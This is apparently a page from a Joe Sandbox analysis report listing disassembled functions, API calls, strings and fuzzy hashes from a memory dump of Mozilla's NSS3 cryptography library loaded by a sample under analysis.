Part of subcall function 6C5539F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C553A3C

PORT_NewArena_Util.NSS3(00000800), ref: 6C554038

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C55404D

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C66A0F4), ref: 6C5540C2

Part of subcall function 6C59F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C59F0C8
Part of subcall function 6C59F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C59F122

SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C55409A

Part of subcall function 6C59BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C54E708,00000000,00000000,00000004,00000000), ref: 6C59BE6A
Part of subcall function 6C59BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5504DC,?), ref: 6C59BE7E
Part of subcall function 6C59BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C59BEC2

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5540DE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5540F4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C554108
SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C55411A
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C554137
SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C554150
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C66A1C8), ref: 6C55417E
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C554194
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C5541A7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5541B2
PK11_DestroyObject.NSS3(?,?), ref: 6C5541D9
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5541FC
SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C66A1A8), ref: 6C55422D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
String ID:
API String ID: 912348568-0
Opcode ID: 82214e688d8b19de8da1ffd96c0cc74edafa8b74e036fe97046a5e70e7c9f4aa
Instruction ID: 07139920d4b72948c995d40a1c02244c450bac9e4b5e5b1846c7ab3cc25e6966
Opcode Fuzzy Hash: 82214e688d8b19de8da1ffd96c0cc74edafa8b74e036fe97046a5e70e7c9f4aa
Instruction Fuzzy Hash: F9510BB5A00300ABF7109B269C41F6776DCDF9524CF84492AFD5AC6F42FB31E93486A1

Function 6C598E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C598E01,00000000,6C599060,6C6A0B64), ref: 6C598E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C598E01,00000000,6C599060,6C6A0B64), ref: 6C598E9E
PORT_ArenaAlloc_Util.NSS3(6C6A0B64,00000001,?,?,?,?,6C598E01,00000000,6C599060,6C6A0B64), ref: 6C598EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C598E01,00000000,6C599060,6C6A0B64), ref: 6C598EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C598E01,00000000,6C599060,6C6A0B64), ref: 6C598ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C598E01,00000000,6C599060,6C6A0B64), ref: 6C598EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C598E01), ref: 6C598EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6A0B64,6C6A0B64), ref: 6C598F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C598F3F

Part of subcall function 6C59A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C59A421,00000000,00000000,6C599826), ref: 6C59A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C598E76

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 09c72fb326c48542d9f7e0ea5140cce6d2a98eb3866ccd495a0b7f50655d33e4
Instruction ID: 1994a8618a78916135966a9b587f2f1b74a3787e9eec77cd6d2a13a4c68c559e
Opcode Fuzzy Hash: 09c72fb326c48542d9f7e0ea5140cce6d2a98eb3866ccd495a0b7f50655d33e4
Instruction Fuzzy Hash: 4E61BEB5D002469FDB10CF56CC80AAFBBB9FF84358F244568DC29A7700E736A915CBA5

Function 6C548E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C548E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C548E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C548EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C6718D0,?), ref: 6C548F03
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C548F19
PL_FreeArenaPool.NSS3(?), ref: 6C548F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C548F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C548F65
PL_FinishArenaPool.NSS3(?), ref: 6C548FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C548FFE
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C549012
PL_FreeArenaPool.NSS3(?), ref: 6C549024
PL_FinishArenaPool.NSS3(?), ref: 6C54902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C54903E

Strings

security, xrefs: 6C548EE7

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: ac72cdcc67baa0c85ae82ce78a355c926e3c99a3ae4c325c9a5063adf302ad87
Instruction ID: 4093af8efb712e05c9066c1339bc9d2c8ed12fc548b2554db3542b48a9cc4e1d
Opcode Fuzzy Hash: ac72cdcc67baa0c85ae82ce78a355c926e3c99a3ae4c325c9a5063adf302ad87
Instruction Fuzzy Hash: DC5126B1608300EBD7109A9A9C41FAB77A8ABC575CF44482AF959D7B40E731DC0986A7

Function 6C60CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C60CC7B), ref: 6C60CD7A

Part of subcall function 6C60CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C57C1A8,?), ref: 6C60CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C60CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C60CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C60CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C60CD8E

Part of subcall function 6C5305C0: PR_EnterMonitor.NSS3 ref: 6C5305D1
Part of subcall function 6C5305C0: PR_ExitMonitor.NSS3 ref: 6C5305EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C60CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C60CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C60CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C60CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C60CE48

Strings

getnameinfo, xrefs: 6C60CDB2, 6C60CE23
ws2_32.dll, xrefs: 6C60CD75
getaddrinfo, xrefs: 6C60CD88, 6C60CDF9
wship6.dll, xrefs: 6C60CDE3
freeaddrinfo, xrefs: 6C60CD9F, 6C60CE10

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: a03b3d3a1608ae5b75a830b028de63e0793300f05fa04a0534767202b7b5a28a
Instruction ID: adab4feaafacdad26cacbc0a33e5962c97d1eae894793d4b60eb9671748ce0f4
Opcode Fuzzy Hash: a03b3d3a1608ae5b75a830b028de63e0793300f05fa04a0534767202b7b5a28a
Instruction Fuzzy Hash: 6511BBA6F13121A6D715AAB63D4059E39985B8325CF181935D80BE1E81FB10D605CAFF

Function 6C651C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C6513BC,?,?,?,6C651193), ref: 6C651C6B
PR_NewLock.NSS3(?,6C651193), ref: 6C651C7E

Part of subcall function 6C6098D0: calloc.MOZGLUE(00000001,00000084,6C530936,00000001,?,6C53102C), ref: 6C6098E5

PR_NewCondVar.NSS3(00000000,?,6C651193), ref: 6C651C91

Part of subcall function 6C52BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C5321BC), ref: 6C52BB8C

PR_NewCondVar.NSS3(00000000,?,?,6C651193), ref: 6C651CA7

Part of subcall function 6C52BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C52BBEB
Part of subcall function 6C52BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C52BBFB
Part of subcall function 6C52BB80: GetLastError.KERNEL32 ref: 6C52BC03
Part of subcall function 6C52BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C52BC19
Part of subcall function 6C52BB80: free.MOZGLUE(00000000), ref: 6C52BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C651193), ref: 6C651CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C651193), ref: 6C651CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C651193), ref: 6C651CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C651193), ref: 6C651D1A

Part of subcall function 6C609BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C531A48), ref: 6C609BB3
Part of subcall function 6C609BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C531A48), ref: 6C609BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C651193), ref: 6C651D3D

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6C651193), ref: 6C651D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C651193), ref: 6C651D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C651193), ref: 6C651D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C651193), ref: 6C651D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C651193), ref: 6C651D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C651193), ref: 6C651D93
PR_DestroyLock.NSS3(00000000,?,?,6C651193), ref: 6C651D9F
free.MOZGLUE(00000000,?,6C651193), ref: 6C651DA8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: f1ee15acca1c080b7d4e53d370050514edd47e3705d7ae7a4f218adf28dc0264
Instruction ID: b953d2ecb74255814e70f038de1b23e2e05bedfe6062c7fcd3e9e630cfaf07fc
Opcode Fuzzy Hash: f1ee15acca1c080b7d4e53d370050514edd47e3705d7ae7a4f218adf28dc0264
Instruction Fuzzy Hash: 5C31D7F1E007019BEB119F65AC41A9776F4AF4574CF140939E84A87B41F771E818CB96

Function 6C565E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C565ECF
EnterCriticalSection.KERNEL32(?), ref: 6C565EE3
PR_Unlock.NSS3(?), ref: 6C565F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C565FB5

Strings

S&Xl, xrefs: 6C5662E3
NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6C5661F4
S&Xl, xrefs: 6C565E6C, 6C56627F, 6C565F12

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
String ID: NSS_USE_DECODED_CKA_EC_POINT$S&Xl$S&Xl
API String ID: 2280678669-3890372999
Opcode ID: 1678256f00d7d65c410d36fcb8063b24a52f31333f85b94971c340b12817e265
Instruction ID: e560ed4f7539385886ac9931bf126968667c8353765533669d94bb1154579c82
Opcode Fuzzy Hash: 1678256f00d7d65c410d36fcb8063b24a52f31333f85b94971c340b12817e265
Instruction Fuzzy Hash: D3F115B4A00215CFDB54CF29C884B86BBF4FF49304F5482AAD8089B756E774EA84CF91

Function 6C5B0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,[l), ref: 6C5B0C81

Part of subcall function 6C59BE30: SECOID_FindOID_Util.NSS3(6C55311B,00000000,?,6C55311B,?), ref: 6C59BE44

Part of subcall function 6C588500: SECOID_GetAlgorithmTag_Util.NSS3(6C5895DC,00000000,00000000,00000000,?,6C5895DC,00000000,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C588517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5B0CC4

Part of subcall function 6C59FAB0: free.MOZGLUE(?,-00000001,?,?,6C53F673,00000000,00000000), ref: 6C59FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5B0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C5B0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C5B0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C5B0D7D
free.MOZGLUE(00000000), ref: 6C5B0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5B0DC1
free.MOZGLUE(00000000), ref: 6C5B0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5B0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5B0E0F

Part of subcall function 6C5895C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C5895E0
Part of subcall function 6C5895C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C5895F5
Part of subcall function 6C5895C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C589609
Part of subcall function 6C5895C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C58961D
Part of subcall function 6C5895C0: PK11_GetInternalSlot.NSS3 ref: 6C58970B
Part of subcall function 6C5895C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C589756
Part of subcall function 6C5895C0: PK11_GetIVLength.NSS3(?), ref: 6C589767
Part of subcall function 6C5895C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C58977E
Part of subcall function 6C5895C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C58978E

Strings

*,[l, xrefs: 6C5B0DCC
-$[l, xrefs: 6C5B0C64
*,[l, xrefs: 6C5B0C69, 6C5B0DE0, 6C5B0C80, 6C5B0C8B, 6C5B0CAF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,[l$*,[l$-$[l
API String ID: 3136566230-357155938
Opcode ID: 69dde2bae92f253878344897e2579db1f5442bb37c8c84cb96d7f23f40d05ba1
Instruction ID: 79c8be1f2f24de5f2af79f00be3ed4b19c6676a0bc9062108a21cbc50deb127b
Opcode Fuzzy Hash: 69dde2bae92f253878344897e2579db1f5442bb37c8c84cb96d7f23f40d05ba1
Instruction Fuzzy Hash: 2041D0F1901246AFEB009F65DD41BAF7A78EF8031CF100129E91667B81E731EA54CBE2

Function 6C5A5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C5A5EC0,00000000,?,?), ref: 6C5A5CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C5A5CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C5A5CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C5A5D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C5A5EC0,00000000,?,?), ref: 6C5A5D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C5A5D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A5D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A5D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C5A5D80

Strings

extern:, xrefs: 6C5A5CEA, 6C5A5D4B
sql:, xrefs: 6C5A5CD1, 6C5A5D36
NSS_DEFAULT_DB_TYPE, xrefs: 6C5A5D1A
dbm:, xrefs: 6C5A5D03, 6C5A5D60
multiaccess:, xrefs: 6C5A5CB8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 9a47c7520db1b02bde911bfde93df16c74513520aa59089a715956a594d85974
Instruction ID: db03f043662381c40b649a649f6e13c6ac7cbf56a80a95a0e608b4c61dc42ab8
Opcode Fuzzy Hash: 9a47c7520db1b02bde911bfde93df16c74513520aa59089a715956a594d85974
Instruction Fuzzy Hash: E531FCB07427526BEB005E779C88F6E3768AF01348F540430FE57E6A81E775DA13C669

Function 6C5A6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C671DE0,?), ref: 6C5A6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C5A6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C5A6D82
DER_GetInteger_Util.NSS3(?), ref: 6C5A6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5A6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C5A6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C5A6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C5A6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C5A6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5A7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C5A7033
free.MOZGLUE(?), ref: 6C5A703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C5A7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C5A7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C5A70AF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

